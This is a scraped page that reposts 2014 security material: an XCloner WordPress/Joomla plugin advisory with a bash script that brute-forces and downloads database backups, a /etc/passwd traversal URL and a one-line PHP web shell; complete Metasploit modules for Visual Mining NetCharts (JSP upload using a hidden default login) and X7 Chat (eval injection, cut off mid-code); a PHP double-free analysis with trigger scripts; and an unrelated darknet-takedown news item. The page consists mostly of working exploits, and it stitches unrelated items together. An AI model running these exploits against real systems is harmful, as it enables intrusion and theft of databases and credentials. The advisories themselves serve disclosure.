akkiliON

Title: XCloner Wordpress/Joomla! backup Plugin v3.1.1 (Wordpress) v3.5.1 (Joomla!) Vulnerabilities Author: Larry W. Cashdollar, @_larry0 Date: 10/17/2014 Download: https://wordpress.org/plugins/xcloner-backup-and-restore/ Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665 Downloads: Wordpress 313,647 Joomla! 515745 StandAlone 69175 Website: http://www.xcloner.com Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/ Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response. CVEID: Requested, TDB. OSVDBID:114176,114177,114178,114179,114180 Description: “XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.” Vulnerabilities: There are multiple vulnerabilities I’ve discovered in this plugin, they are as follows. 1. Arbitrary command execution. 2. Clear text MySQL password exposure through html text box under configuration panel. 3. Database backups exposed to local users due to open file permissions. 4. Unauthenticated remote access to backup files via easily guessable file names. 5. Authenticated remote file access. 6. MySQL password exposed to process table. Arbitrary Command Execution Plugin allows arbitrary commands to be executed by an authenticated user. The user will require administrative access rights to backup the database. User input when specifying your own file name is not sanitized as well as various other input fields. PoC All input fields I believe are vulnerable, I’ve chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data. Screenshots available at the advisory URL above. All user configurable variables are vulnerable, these variables need to be sanitized before being passed to the exec() function for execution. $_CONFIG[tarpath] $exclude $_CONFIG['tarcompress'] $_CONFIG['filename'] $_CONFIG['exfile_tar'] $_CONFIG[sqldump] $_CONFIG['mysql_host'] $_CONFIG['mysql_pass'] $_CONFIG['mysql_user'] $database_name $sqlfile $filename Vulnerable code ./cloner.functions.php: 1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html"); 1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql"); 1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt"); 1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt"); 1695- if ($_REQUEST[cron_dbonly] != 1) { 1696: exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . " -chv" . $_CONFIG['tarcompress'] . "f $filename ./"); 1697- } else { 1698- 1699- 1700: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql"); 1701- 1702- if (is_array($databases_incl)) { 1703- foreach ($databases_incl as $database_name) 1704- if ($database_name != "") { 1705: exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/" . $database_name . "-sql.sql"); 1706- } 1707- } 1708- } -- 1873- { 1874- //$sizeInBytes = filesize($path); 1875- $sizeInBytes = sprintf("%u", filesize($path)); 1876: if ((!$sizeInBytes) and (function_exists("exec"))){ 1877- $command = "ls -l \"$path\" | cut -d \" \" -f 5"; 1878: $sizeInBytes = @exec($command); 345- } 346- 347- return $sizeInBytes; ./restore/XCloner.php 290- }else{ 291- if($ext == '.tgz') $compress = 'z'; 292- else $compress = ''; 293: shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]"); 294- } 295-} 1077- if($_REQUEST['use_mysqldump'] == 1){ 1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile); 1079- return; 1080- } Clear Text MySQL Database Password The plugin also returns the MySQL clear text password via html text box back to the user in the configuration panel. A password should never be repeated back to you in clear text. The plugin will happily send this over a clear text connection. Screenshots available at the advisory URL above. Remote Database Download & Local File Permissions The default recommend path for backup storage is /usr/share/wordpress/administrator/backups. An index.html file is created under this directory to prevent casual browsing however the file names are easily predictable. From the installation instructions: “XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your Wordpress root and make it fully writeable.” The format of the filenames are: backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar where OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected during time of backup. The domain name is set by the HTTP_HOST header from line 88 of cloner.config.php: 88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST']; root@larry:/usr/share/wordpress/administrator/backups# ls -l total 129432 -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar These file permissions also expose the contents of the databases to any local system users. File naming convention code is as follows: 1327 $domainname = $_CONFIG['mosConfig_live_site']; 1351 if ($_REQUEST['bname'] == "") { 1352 if ($backupDatabase == 1) { 1353 if ($_REQUEST['dbbackup_drop']) { 1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext; 1355 } else { 1356 1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext; 1358 } 1359 } else 1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext; 1361 } else { Screenshots available at the advisory URL above. I’ve found a few vulnerable websites with the google dork: [url]https://www.google.com/#q=inurl:+administrator%2Fbackups[/url] A PoC: lwc@wordpress:~$ bash exp.sh 192.168.0.26 [+] Location [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar[/url] Found [+] Received HTTP/1.1 200 OK Downloading...... --2014-10-30 13:02:51-- [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar[/url] Connecting to 192.168.0.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44400640 (42M) [application/x-tar] Saving to: `backup_2014-10-30_06-27_-sql-nodrop.tar.1' 100%[========================================>] 44,400,640 56.9M/s in 0.7s 2014-10-30 13:02:52 (56.9 MB/s) - `backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640] [+] Location [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar[/url] Found [+] Received HTTP/1.1 200 OK Downloading...... --2014-10-30 13:02:52-- [url]http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar[/url] Connecting to 192.168.0.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44400640 (42M) [application/x-tar] Saving to: `backup_2014-10-30_06-33_-sql-nodrop.tar.1' 100%[========================================>] 44,400,640 64.1M/s in 0.7s 2014-10-30 13:02:53 (64.1 MB/s) - `backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640] #!/bin/bash #Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177 #Larry W. Cashdollar, @_larry0 #XCloner recommends a backup storage path under the WP root directory #it uses a 0 size index.html file to block indexing. #we can try to brute force the filenames it creates. MONTH=10 DAY=30 #May need to set the DOMAIN to $1 the target depending on how WP is configured. DOMAIN= for y in `seq -w 1 24`; do for x in `seq -w 1 59`; do CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar"; RESULT=`curl -s --head $CPATH|grep 200`; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo "Downloading......"; wget $CPATH fi; done done Remote File Access The user has to have administrative rights, but the backup downloader doesn’t check the path for ../. [url]http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd[/url] Will download /etc/passwd off the remote system. MySQL Database Password Exposed to Process Table Local users can steal the MySQL password by watching the process table: lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords www-data 16691 8889 0 09:27 ? 00:00:00 sh -c mysqldump --quote-names -h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql --allow-keywords www-data 16692 16691 0 09:27 ? 00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords ^C Source: Joomla/WordPress XCloner Command Execution / Password Disclosure ? Packet Storm

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper DEFAULT_USERNAME = 'Scheduler' DEFAULT_PASSWORD = '!@#$scheduler$#@!' SIGNATURE = 'was uploaded successfully and is now ready for installation' def initialize(info = {}) super(update_info(info, 'Name' => 'Visual Mining NetCharts Server Remote Code Execution', 'Description' => %q{ This module exploits multiple vulnerabilities in Visual Mining NetCharts. First, a lack of input validation in the administration console permits arbitrary jsp code upload to locations accessible later through the web service. Authentication is typically required, however a 'hidden' user is available by default (and non editable). This user, named 'Scheduler', can only login to the console after any modification in the user database (a user is added, admin password is changed etc). If the 'Scheduler' user isn't available valid credentials must be supplied. The default Admin password is Admin. }, 'Author' => [ 'sghctoma', # Vulnerability Discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-8516'], ['ZDI', '14-372'] ], 'Privileged' => true, 'Platform' => %w{ linux win }, 'Arch' => ARCH_JAVA, 'Targets' => [ ['Visual Mining NetCharts Server 7.0', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 03 2014')) register_options( [ Opt::RPORT(8001), OptString.new('USERNAME', [false, "The username to authenticate with"]), OptString.new('PASSWORD', [false, "The password to authenticate with"]) ], self.class) end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri('/', 'Admin', 'archive', 'upload.jsp'), 'vars_get' => { 'mode' => 'getZip' }, 'authorization' => basic_auth(username, password) }) if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE) Exploit::CheckCode::Detected else Exploit::CheckCode::Safe end end def exploit jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp" print_status("#{peer} - Uploading JSP payload #{jsp_payload}...") if upload(jsp_payload, payload.encoded) print_good("#{peer} - JSP payload uploaded successfully") register_file_for_cleanup("./webapps/Admin/archive/ArchiveCache/#{jsp_payload}") else fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed") end print_status("#{peer} - Executing payload...") execute(jsp_payload, 1) end def execute(jsp_name, time_out = 20) res = send_request_cgi({ 'uri' => normalize_uri('/', 'Admin', 'archive', 'ArchiveCache', jsp_name), 'method' => 'GET', 'authorization' => basic_auth(username, password) }, time_out) res end def upload(file_name, contents) post_data = Rex::MIME::Message.new post_data.add_part( contents, 'application/octet-stream', nil, "form-data; name=\"FILE1\"; filename=\"#{file_name}\x00Archive0101140101.zip\"" ) res = send_request_cgi({ 'uri' => normalize_uri("/", 'Admin', 'archive', 'upload.jsp'), 'method' => 'GET', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s, 'vars_get' => { 'mode' => 'getZip' }, 'authorization' => basic_auth(username, password) }) if res && res.code == 200 && res.body && res.body.to_s.include?(SIGNATURE) true else false end end def username datastore['USERNAME'].blank? ? DEFAULT_USERNAME : datastore['USERNAME'] end def password datastore['PASSWORD'].blank? ? DEFAULT_PASSWORD : datastore['PASSWORD'] end end Link: http://www.exploit-db.com/exploits/35211/

The joint operation by authorities of the U.S. Federal Bureau of Investigation (FBI) and European law enforcement seized Silk Road 2.0, an alternative to the notorious online illegal-drug marketplace last week, and arrested 26-year-old operator Blake Benthall, but that wasn't the end. US and European authorities over the weekend announced the seizure of 27 different websites as part of a much larger operation called Operation Onymous, which led to take-down of more than "410 hidden services" that sell illegal goods and services from drugs to murder-for-hire assassins by masking their identities using the Tor encryption network. This globally-coordinated take down is the combined efforts of 17 nations which includes the law enforcement agencies in the U.S. and 16 member nations of Europol. The operation led to the arrest of 17 people, operators of darknet websites and the seizure of $1 million in Bitcoin, 180,000 Euros in cash, drugs, gold and silver. According to U.S. authorities, Operation Onymous is the largest law enforcement action till now against the illegal websites operating on the Tor network, which helps users to communicate anonymously by hiding their IP addresses. The authorities have not yet publicly disclosed the full list of the seized Tor websites, but it appears that less than 20% of the total darknet website have been shut down in the joint cyber crime operation including the seizure of Silk Road 2.0 earlier this week. "Silk Road" was the notorious online illegal-drug marketplace that generated $8 million in monthly sales and attracted 150,000 vendors and customers. The FBI seized the darknet website in October of 2013 and after five weeks, Silk Road 2.0 was launched. On Sunday, the Tor Project said it has no idea how the law enforcement authorities were able to identify the servers that were shut down last week as part of Operation Onymous. "We not contacted directly or indirectly by Europol nor any other agency involved," a spokesperson for the Tor project "Phobos" said in a statement. Surs?: http://thehackernews.com/2014/11/more-than-400-underground-sites-seized_10.html

Description: ------------ PHP 5.5.12 suffers from a memory corruption vulnerability that could potentially be exploited to achieve remote code execution. The vulnerability exists due to inconsistent behavior in the get_icu_value_internal function of ext\intl\locale\locale_methods.c. In most cases, get_icu_value_internal allocates memory that the caller is expected to free. However, if the first argument, loc_name, satisfies the conditions specified by the isIDPrefix macro (figure 1), and fromParseLocal is true, loc_name itself is returned. If a caller abides by contract and frees the return value of such a call, then the pointer passed via loc_name is freed again elsewhere, a double free occurs. Figure 1. Macros used by get_icu_value_internal. #define isIDSeparator(a) (a == '_' || a == '-') [...] #define isPrefixLetter(a) ((a=='x')||(a=='X')||(a=='i')||(a=='I')) [...] #define isIDPrefix(s) (isPrefixLetter(s[0])&&isIDSeparator(s[1])) The zif_locale_parse function, which is exported to PHP as Locale::parseLocale, makes a call to get_icu_value_internal with potentially untrusted data. By passing a specially crafted locale (figure 2), remote code execution may be possible. The exploitability of this vulnerability is dependent on the attack surface of a given application. In instances where the locale string is exposed as a user configuration setting, it may be possible to achieve either pre- or post-authentication remote code execution. In other scenarios this vulnerability may serve as a means to achieve privilege escalation. Figure 2. A call to Locale::parseLocale that triggers the exploitable condition. Locale::parseLocale("x-AAAAAA"); Details for the two frees are shown in figures 3 and 4. Figure 3. The first free. 0:000> kP ChildEBP RetAddr 016af25c 7146d7a3 php5ts!_efree( void * ptr = 0x030bf1e0)+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440] 016af290 7146f6a2 php_intl!add_array_entry( char * loc_name = 0x0179028c "", struct _zval_struct * hash_arr = 0x00000018, char * key_name = 0x71489e60 "language", void *** tsrm_ls = 0x7146f6a2)+0x1d3 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1073] 016af2b0 0f0c15ab php_intl!zif_locale_parse( int ht = 0n1, struct _zval_struct * return_value = 0x030bf4c8, struct _zval_struct ** return_value_ptr = 0x00000000, struct _zval_struct * this_ptr = 0x00000000, int return_value_used = 0n1, void *** tsrm_ls = 0x0178be38)+0xb2 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\ext\intl\locale\locale_methods.c @ 1115] 016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC( struct _zend_execute_data * execute_data = 0x0179028c, void *** tsrm_ls = 0x00000018)+0x1cb [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 551] 016af358 0f114757 php5ts!execute_ex( struct _zend_execute_data * execute_data = 0x030bef20, void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363] 016af380 0f0e60ea php5ts!zend_execute( struct _zend_op_array * op_array = 0x030be5f0, void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388] 016af3b4 0f0e4a00 php5ts!zend_execute_scripts( int type = 0n8, void *** tsrm_ls = 0x00000001, struct _zval_struct ** retval = 0x00000000, int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317] 016af5c0 00cc21fb php5ts!php_execute_script( struct _zend_file_handle * primary_file = <Memory access error>, void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506] 016af844 00cc2ed1 php!do_cli( int argc = 0n24707724, char ** argv = 0x00000018, void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995] 016af8e0 00cca05e php!main( int argc = 0n2, char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378] 016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536] 016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe 016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20 016af980 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> ub eip php5ts!_efree+0x49 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]: 0f0b1ef9 732e jae php5ts!_efree+0x79 (0f0b1f29) 0f0b1efb 817e4c00000200 cmp dword ptr [esi+4Ch],20000h 0f0b1f02 7325 jae php5ts!_efree+0x79 (0f0b1f29) 0f0b1f04 8bc2 mov eax,edx 0f0b1f06 c1e803 shr eax,3 0f0b1f09 8d0c86 lea ecx,[esi+eax*4] 0f0b1f0c 8b4148 mov eax,dword ptr [ecx+48h] 0f0b1f0f 894708 mov dword ptr [edi+8],eax 0:000> u eip php5ts!_efree+0x62 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_alloc.c @ 2440]: 0f0b1f12 897948 mov dword ptr [ecx+48h],edi 0f0b1f15 01564c add dword ptr [esi+4Ch],edx 0f0b1f18 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)] 0f0b1f1d 85c0 test eax,eax 0f0b1f1f 0f851d040000 jne php5ts!_efree+0x492 (0f0b2342) 0f0b1f25 5f pop edi 0f0b1f26 5e pop esi 0f0b1f27 59 pop ecx 0:000> ?edi+8 Evaluate expression: 51114464 = 030bf1e0 0:000> dc edi+8 030bf1e0 00000000 41414141 00000000 00000000 ....AAAA........ 030bf1f0 00000011 00000019 61636f6c 0300656c ........locale.. 030bf200 00000011 00000011 6e697270 00725f74 ........print_r. 030bf210 00000109 00000011 030bf320 030bf210 ........ ....... 030bf220 01790494 00000000 00000000 00000000 ..y............. 030bf230 00000000 00000000 00000000 00000000 ................ 030bf240 00000000 00000000 00000000 00000000 ................ 030bf250 00000000 00000000 00000000 00000000 ................ Figure 4. The second free. 0:000> kP ChildEBP RetAddr 016af2c4 0f0c1813 php5ts!_zval_dtor_func( struct _zval_struct * zvalue = 0x030bf3f8)+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36] 016af314 0f0c0c07 php5ts!zend_do_fcall_common_helper_SPEC( struct _zend_execute_data * execute_data = 0x0179028c, void *** tsrm_ls = 0x00000018)+0x433 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 642] 016af358 0f114757 php5ts!execute_ex( struct _zend_execute_data * execute_data = 0x030bef20, void *** tsrm_ls = 0x0178be38)+0x397 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 363] 016af380 0f0e60ea php5ts!zend_execute( struct _zend_op_array * op_array = 0x030be5f0, void *** tsrm_ls = 0x00000007)+0x1c7 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_vm_execute.h @ 388] 016af3b4 0f0e4a00 php5ts!zend_execute_scripts( int type = 0n8, void *** tsrm_ls = 0x00000001, struct _zval_struct ** retval = 0x00000000, int file_count = 0n3)+0x14a [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend.c @ 1317] 016af5c0 00cc21fb php5ts!php_execute_script( struct _zend_file_handle * primary_file = <Memory access error>, void *** tsrm_ls = <Memory access error>)+0x190 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\main\main.c @ 2506] 016af844 00cc2ed1 php!do_cli( int argc = 0n24707724, char ** argv = 0x00000018, void *** tsrm_ls = 0x0178be38)+0x87b [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 995] 016af8e0 00cca05e php!main( int argc = 0n2, char ** argv = 0x01791d68)+0x4c1 [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\sapi\cli\php_cli.c @ 1378] 016af920 76e1919f php!__tmainCRTStartup(void)+0xfd [f:\dd\vctools\crt_bld\self_x86\crt\src\crtexe.c @ 536] 016af92c 770ba8cb KERNEL32!BaseThreadInitThunk+0xe 016af970 770ba8a1 ntdll!__RtlUserThreadStart+0x20 016af980 00000000 ntdll!_RtlUserThreadStart+0x1b 0:000> ub eip php5ts!_zval_dtor_func+0x5e [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]: 0f0b1cae 0f8394000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48) 0f0b1cb4 817f4c00000200 cmp dword ptr [edi+4Ch],20000h 0f0b1cbb 0f8387000000 jae php5ts!_zval_dtor_func+0xf8 (0f0b1d48) 0f0b1cc1 8bc2 mov eax,edx 0f0b1cc3 c1e803 shr eax,3 0f0b1cc6 8d0c87 lea ecx,[edi+eax*4] 0f0b1cc9 8b4148 mov eax,dword ptr [ecx+48h] 0f0b1ccc 894608 mov dword ptr [esi+8],eax 0:000> u eip php5ts!_zval_dtor_func+0x7f [c:\php-sdk\php55\vc11\x86\php-5.5.12-ts\zend\zend_variables.c @ 36]: 0f0b1ccf 897148 mov dword ptr [ecx+48h],esi 0f0b1cd2 01574c add dword ptr [edi+4Ch],edx 0f0b1cd5 a148456a0f mov eax,dword ptr [php5ts!zend_unblock_interruptions (0f6a4548)] 0f0b1cda 85c0 test eax,eax 0f0b1cdc 0f8591010000 jne php5ts!_zval_dtor_func+0x223 (0f0b1e73) 0f0b1ce2 5f pop edi 0f0b1ce3 5e pop esi 0f0b1ce4 c3 ret 0:000> ?esi+8 Evaluate expression: 51114464 = 030bf1e0 0:000> dc esi+8 030bf1e0 030bf1d8 41414141 00000000 00000000 ....AAAA........ 030bf1f0 00000011 00000019 61636f6c 0300656c ........locale.. 030bf200 00000011 00000011 6e697270 00725f74 ........print_r. 030bf210 00000109 00000011 030bf320 030bf210 ........ ....... 030bf220 01790494 00000000 00000000 00000000 ..y............. 030bf230 00000000 00000000 00000000 00000000 ................ 030bf240 00000000 00000000 00000000 00000000 ................ 030bf250 00000000 00000000 00000000 00000000 ................ The outcome of the double free depends on the arrangement of the heap. A simple script that produces a variety of read access violations is shown in figure 5, and another that reliably produces data execution prevention access violations is provided in figure 6. Figure 5. A script that produces a variety of AVs. <?php Locale::parseLocale("x-AAAAAA"); $foo = new SplTempFileObject(); ?> Figure 6. A script that reliably produces DEPAVs. <?php Locale::parseLocale("x-7-644T-42-1Q-7346A896-656s-75nKaOG"); $pe = new SQLite3($pe, new PDOException(($pe->{new ReflectionParameter(TRUE, new RecursiveTreeIterator((null > ($pe+=new RecursiveCallbackFilterIterator((object)$G16 = new Directory(), DatePeriod::__set_state()))), (array)$h453 = new ReflectionMethod(($pe[TRUE]), $G16->rewind((array)"mymqaodaokubaf")), ($h453->getShortName() === null), ($I68TB = new InvalidArgumentException($H03 = new DOMStringList(), null, (string)MessageFormatter::create($sC = new AppendIterator(), new DOMUserDataHandler())) & null)))}), ($h453[(bool)DateInterval::__set_state()]), new PDOStatement()), TRUE); $H03->item((unset)$gn = new SplStack()); $sC->valid(); ?> To fix the vulnerability, get_icu_value_internal should be modified to return a copy of loc_name rather than loc_name itself. This can be done easily using the estrdup function. The single line fix is shown in figures 7 and 8. Figure 7. The original code. if( strcmp(tag_name , LOC_LANG_TAG)==0 ){ if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){ return (char *)loc_name; } } Figure 8. The fixed code. if( strcmp(tag_name , LOC_LANG_TAG)==0 ){ if( strlen(loc_name)>1 && (isIDPrefix(loc_name) ==1 ) ){ return estrdup(loc_name); } } https://bugs.php.net/bug.php?id=67349

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution', 'Description' => %q{ This module exploits a post-auth vulnerability found in X7 Chat versions 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which uses preg_replace() function with the /e modifier. This allows a remote authenticated attacker to execute arbitrary PHP code in the remote machine. }, 'License' => MSF_LICENSE, 'Author' => [ 'Fernando Munoz <fernando[at]null-life.com>', # discovery & module development 'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @ITsecurityco ], 'References' => [ # Using this URL because isn't nothing else atm ['URL', 'https://github.com/rapid7/metasploit-framework/pull/4076'] ], 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Generic (PHP Payload)', {}]], 'DisclosureDate' => 'Oct 27 2014', 'DefaultTarget' => 0)) register_options( [ OptString.new('USERNAME', [ true, 'Username to authenticate as', '']), OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', '']), OptString.new('TARGETURI', [ true, 'Base x7 Chat directory path', '/x7chat2']), ], self.class) end def check res = exec_php('phpinfo(); die();', true) if res && res.body =~ /This program makes use of the Zend/ return Exploit::CheckCode::Vulnerable else return Exploit::CheckCode::Unknown end end def exec_php(php_code, is_check = false) # remove comments, line breaks and spaces of php_code payload_clean = php_code.gsub(/(\s+)|(#.*)/, '') # clean b64 payload (we can not use quotes or apostrophes and b64 string must not contain equals) while Rex::Text.encode_base64(payload_clean) =~ /=/ payload_clean = "#{ payload_clean } " end payload_b64 = Rex::Text.encode_base64(payload_clean) cookie_x7c2u = "X7C2U=#{ datastore['USERNAME'] }" cookie_x7c2p = "X7C2P=#{ Rex::Text.md5(datastore['PASSWORD']) }" rand_text = Rex::Text.rand_text_alpha_upper(5, 8) print_status("Trying for version 2.0.2 up to 2.0.5.1") print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", }, 'vars_get' => { # value compatible with 2.0.2 up to 2.0.5.1 'act' => 'user_cp', 'cp_page' => 'msgcenter', 'to' => datastore['USERNAME'], 'subject' => rand_text, 'body' => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }", } }) unless res && res.code == 200 print_error("Sending the message (#{ rand_text }) has failed") return false end if res.body =~ /([0-9]*)">#{ rand_text }/ message_id = Regexp.last_match[1] user_panel = 'user_cp' else print_error("Could not find message (#{ rand_text }) in the message list") print_status("Retrying for version 2.0.0 up to 2.0.1 a1") print_status("Sending offline message (#{ rand_text }) to #{ datastore['USERNAME'] }...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", }, 'vars_get' => { # value compatible with 2.0.0 up to 2.0.1 a1 'act' => 'usercp', 'cp_page' => 'msgcenter', 'to' => datastore['USERNAME'], 'subject' => rand_text, 'body' => "#{ rand_text }www.{${eval(base64_decode($_SERVER[HTTP_#{ rand_text }]))}}.c#{ rand_text }", } }) unless res && res.code == 200 print_error("Sending the message (#{ rand_text }) has failed") return false end if res.body =~ /([0-9]*)">#{ rand_text }/ message_id = Regexp.last_match[1] user_panel = 'usercp' else print_error("Could not find message (#{ rand_text }) in the message list") return false end end print_status("Accessing message (#{ rand_text })") print_status("Sending payload in HTTP header '#{ rand_text }'") if is_check timeout = 20 else timeout = 3 end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", rand_text => payload_b64, }, 'vars_get' => { 'act' => user_panel, 'cp_page' => 'msgcenter', 'read' => message_id, } }, timeout) res_payload = res print_status("Deleting message (#{ rand_text })") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'headers' => { 'Cookie' => "#{ cookie_x7c2u }; #{ cookie_x7c2p };", }, 'vars_get' => { 'act' => user_panel, 'cp_page' => 'msgcenter', 'delete' => message_id, } }) if res && res.body =~ /The message has been deleted/ print_good("Message (#{ rand_text }) removed") else print_error("Removing message (#{ rand_text }) has failed") return false end # if check return the response if is_check return res_payload else return true end end def exploit unless exec_php(payload.encoded) fail_with(Failure::Unknown, 